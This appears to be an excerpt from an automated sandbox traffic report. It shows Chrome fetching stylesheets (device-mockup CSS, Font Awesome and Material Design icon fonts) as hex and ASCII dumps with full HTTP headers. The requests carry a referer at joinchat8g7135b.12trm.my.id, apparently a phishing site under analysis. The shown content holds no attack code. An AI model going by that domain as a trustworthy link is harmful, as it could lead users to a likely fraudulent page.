                          2024-05-27 22:30:13 UTC1369INData Raw: 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 31 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 33 35 37 38 65 35 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 31 70 78 20 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 29 3b 0a 20 20 20 20 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 0a 20 20
                          Data Ascii: ze: 14px; font-family: Roboto; font-weight: bold; text-align: center; text-shadow: 1px 0px rgba(0, 0, 0, 0.3); border: 1px solid #3578e5; border-radius: 5px; box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1); outline: none;
                          2024-05-27 22:30:13 UTC1369INData Raw: 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0a 7d 0a 2e 6c 61 6e 67 75 61 67 65 2d 6e 61 6d 65 2d 61 63 74 69 76 65 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 39 30 39 34 39 63 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 2e 63 6f 70 79 72 69 67 68 74 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 34 30 25 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 39 30 39 34 39 63 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20
                          Data Ascii: border-radius: 3px;}.language-name-active { color: #90949c; font-weight: bold;}.copyright { width: 40%; height: auto; margin-top: 10px; margin-left: auto; margin-right: auto; color: #90949c; font-size: 12px;
                          2024-05-27 22:30:13 UTC1369INData Raw: 20 2e 62 6f 74 74 6f 6d 2d 62 61 72 7b 68 65 69 67 68 74 3a 33 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 62 6c 61 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 20 2e 6d 69 64 64 6c 65 2d 62 61 72 7b 77 69 64 74 68 3a 33 70 78 3b 68 65 69 67 68 74 3a 34 70 78 3b 74 6f 70 3a 30 70 78 3b 6c 65 66 74 3a 39 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 62 6c 61 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 68 65 69 67 68 74 3a 36 36 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 35 70 78 20 32 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 39 64 62 64 63 3b 62 6f
                          Data Ascii: .bottom-bar{height:3px;background:black;width:100%;display:block}.marvel-device .middle-bar{width:3px;height:4px;top:0px;left:90px;background:black;position:absolute}.marvel-device.iphone8{width:375px;height:667px;padding:105px 24px;background:#d9dbdc;bo
                          2024-05-27 22:30:13 UTC1369INData Raw: 6d 2d 62 61 72 7b 68 65 69 67 68 74 3a 31 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 62 66 62 66 63 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 6f 74 74 6f 6d 3a 36 38 70 78 3b 6c 65 66 74 3a 30 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 20 2e 73 6c 65 65 70 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 31 39 30 70 78 3b 72 69 67 68 74 3a 2d 34 70 78 3b 77 69 64 74 68 3a 34 70 78 3b 68 65 69 67 68 74 3a 36 36 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 70 78 20 32 70 78 20 32 70 78 20 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 39 64 62 64 63 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 20 2e 76 6f 6c 75 6d 65 7b 70 6f 73 69 74 69 6f 6e 3a 61
                          Data Ascii: m-bar{height:14px;background:#bfbfc0;position:absolute;bottom:68px;left:0}.marvel-device.iphone8 .sleep{position:absolute;top:190px;right:-4px;width:4px;height:66px;border-radius:0px 2px 2px 0px;background:#d9dbdc}.marvel-device.iphone8 .volume{position:a
                          2024-05-27 22:30:13 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 3a 23 66 39 65 37 64 33 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 2e 67 6f 6c 64 20 2e 68 6f 6d 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 65 62 62 61 39 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 20 23 63 65 62 62 61 39 20 30 25 2c 20 23 66 39 65 37 64 33 20 35 30 25 2c 20 23 63 65 62 62 61 39 20 31 30 30 25 29 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 2e 62 6c 61 63 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 34 36 34 36 34 36 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 33 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 37 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e
                          Data Ascii: kground:#f9e7d3}.marvel-device.iphone8.gold .home{background:#cebba9;background:linear-gradient(135deg, #cebba9 0%, #f9e7d3 50%, #cebba9 100%)}.marvel-device.iphone8.black{background:#464646;-webkit-box-shadow:inset 0 0 3px 0 rgba(0,0,0,0.7);box-shadow:in
                          2024-05-27 22:30:13 UTC1369INData Raw: 6c 65 66 74 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 20 32 70 78 20 30 70 78 20 30 70 78 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 2e 6c 61 6e 64 73 63 61 70 65 20 2e 76 6f 6c 75 6d 65 3a 61 66 74 65 72 7b 6c 65 66 74 3a 2d 38 32 70 78 3b 77 69 64 74 68 3a 36 36 70 78 3b 68 65 69 67 68 74 3a 34 70 78 3b 74 6f 70 3a 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 20 32 70 78 20 30 70 78 20 30 70 78 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 2e 6c 61 6e 64 73 63 61 70 65 20 2e 74 6f 70 2d 62 61 72 7b 77 69 64 74 68 3a 31 34 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 36 38 70 78 20 2d 20 20 31 34 70 78 29 3b 74 6f 70
                          Data Ascii: left:auto;border-radius:2px 2px 0px 0px}.marvel-device.iphone8.landscape .volume:after{left:-82px;width:66px;height:4px;top:0;border-radius:2px 2px 0px 0px}.marvel-device.iphone8.landscape .top-bar{width:14px;height:100%;left:calc(100% - 68px - 14px);top
                          2024-05-27 22:30:13 UTC1369INData Raw: 30 20 33 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 29 2c 69 6e 73 65 74 20 30 20 30 20 36 70 78 20 33 70 78 20 23 66 66 66 3b 7a 2d 69 6e 64 65 78 3a 32 7d 2e 6d 61 72 76 65 6c 2d 64 65 76 69 63 65 2e 69 70 68 6f 6e 65 38 70 6c 75 73 20 2e 68 6f 6d 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 30 25 3b 77 69 64 74 68 3a 36 38 70 78 3b 68 65 69 67 68 74 3a 36 38 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 35 30 25 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 33 34 70 78 3b 62 6f 74 74 6f 6d 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 33 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 30 33 32 33 33 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 20 23 33
                          Data Ascii: 0 3px 0 rgba(0,0,0,0.1),inset 0 0 6px 3px #fff;z-index:2}.marvel-device.iphone8plus .home{border-radius:100%;width:68px;height:68px;position:absolute;left:50%;margin-left:-34px;bottom:24px;z-index:3;background:#303233;background:linear-gradient(135deg, #3


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449739104.17.24.144435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:13 UTC598OUTGET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1
                          Host: cdnjs.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:13 UTC952INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:13 GMT
                          Content-Type: text/css; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=30672000
                          ETag: W/"5eb03e5f-7918"
                          Last-Modified: Mon, 04 May 2020 16:10:07 GMT
                          cf-cdnjs-via: cfworker/kv
                          Cross-Origin-Resource-Policy: cross-origin
                          Timing-Allow-Origin: *
                          X-Content-Type-Options: nosniff
                          CF-Cache-Status: HIT
                          Age: 865865
                          Expires: Sat, 17 May 2025 22:30:13 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLjTnHJz4HZCAeN%2FAuOKv2zowCLH595H6EG%2BJ5kt8HttA7vg%2BB%2BzKYUWDxlUMz4nILF9Ej5a8fEaxcJmGWvicsUX1SIwOkhh%2FcPu26JPryTyQC%2FrEIwTyMgKZEdB%2BkM9osnq04B9"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                          Strict-Transport-Security: max-age=15780000
                          Server: cloudflare
                          CF-RAY: 88a972c0ea150f91-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:13 UTC417INData Raw: 37 39 31 38 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 37
                          Data Ascii: 7918/*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7
                          2024-05-27 22:30:13 UTC1369INData Raw: 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61
                          Data Ascii: '../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{displa
                          2024-05-27 22:30:13 UTC1369INData Raw: 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64
                          Data Ascii: %{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359d
                          2024-05-27 22:30:13 UTC1369INData Raw: 74 61 63 6b 2d 31 78 2c 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 61 2d 73 74 61 63 6b 2d 31 78 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 2d 67 6c 61 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 30 22 7d 2e 66 61 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 31 22 7d 2e 66 61 2d 73 65 61 72 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30
                          Data Ascii: tack-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f00
                          2024-05-27 22:30:13 UTC1369INData Raw: 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 33 22 7d 2e 66 61 2d 66 6c 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 34 22 7d 2e 66 61 2d 68 65 61 64 70 68 6f 6e 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 35 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 36 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 37 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 38 22 7d 2e 66 61 2d 71 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 39 22 7d 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72
                          Data Ascii: ore{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:befor
                          2024-05-27 22:30:13 UTC1369INData Raw: 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 38 22 7d 2e 66 61 2d 66 61 73 74 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 39 22 7d 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 61 22 7d 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 62 22 7d 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 63 22 7d 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 64 22 7d 2e 66 61 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 65 22 7d 2e 66 61 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63
                          Data Ascii: fore{content:"\f048"}.fa-fast-backward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{c
                          2024-05-27 22:30:13 UTC1369INData Raw: 7d 2e 66 61 2d 65 79 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 30 22 7d 2e 66 61 2d 77 61 72 6e 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 31 22 7d 2e 66 61 2d 70 6c 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 32 22 7d 2e 66 61 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 33 22 7d 2e 66 61 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 34 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62
                          Data Ascii: }.fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:b
                          2024-05-27 22:30:13 UTC1369INData Raw: 2d 70 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 35 22 7d 2e 66 61 2d 73 71 75 61 72 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 36 22 7d 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 37 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 38 22 7d 2e 66 61 2d 74 77 69 74 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 39 22 7d 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 61 22 7d 2e 66 61 2d 67 69 74 68 75 62 3a 62 65 66 6f 72 65 7b
                          Data Ascii: -phone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{
                          2024-05-27 22:30:13 UTC1369INData Raw: 3a 22 5c 66 30 63 36 22 7d 2e 66 61 2d 73 61 76 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 6c 6f 70 70 79 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 37 22 7d 2e 66 61 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 38 22 7d 2e 66 61 2d 6e 61 76 69 63 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 6f 72 64 65 72 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 39 22 7d 2e 66 61 2d 6c 69 73 74 2d 75 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 61 22 7d 2e 66 61 2d 6c 69 73 74 2d 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 62 22 7d 2e 66 61 2d 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 62 65
                          Data Ascii: :"\f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:be
                          2024-05-27 22:30:13 UTC1369INData Raw: 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 39 22 7d 2e 66 61 2d 70 61 73 74 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 63 6c 69 70 62 6f 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 61 22 7d 2e 66 61 2d 6c 69 67 68 74 62 75 6c 62 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 62 22 7d 2e 66 61 2d 65 78 63 68 61 6e 67 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 63 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 64 22 7d 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 65 65 22 7d 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 7b 63
                          Data Ascii: :before{content:"\f0e9"}.fa-paste:before,.fa-clipboard:before{content:"\f0ea"}.fa-lightbulb-o:before{content:"\f0eb"}.fa-exchange:before{content:"\f0ec"}.fa-cloud-download:before{content:"\f0ed"}.fa-cloud-upload:before{content:"\f0ee"}.fa-user-md:before{c


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.449738104.17.24.144435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:13 UTC628OUTGET /ajax/libs/material-design-iconic-font/2.1.2/css/material-design-iconic-font.min.css HTTP/1.1
                          Host: cdnjs.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:14 UTC939INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:14 GMT
                          Content-Type: text/css; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=30672000
                          ETag: W/"5eb03ed9-10ad7"
                          Last-Modified: Mon, 04 May 2020 16:12:09 GMT
                          cf-cdnjs-via: cfworker/kv
                          Cross-Origin-Resource-Policy: cross-origin
                          Timing-Allow-Origin: *
                          X-Content-Type-Options: nosniff
                          CF-Cache-Status: MISS
                          Expires: Sat, 17 May 2025 22:30:14 GMT
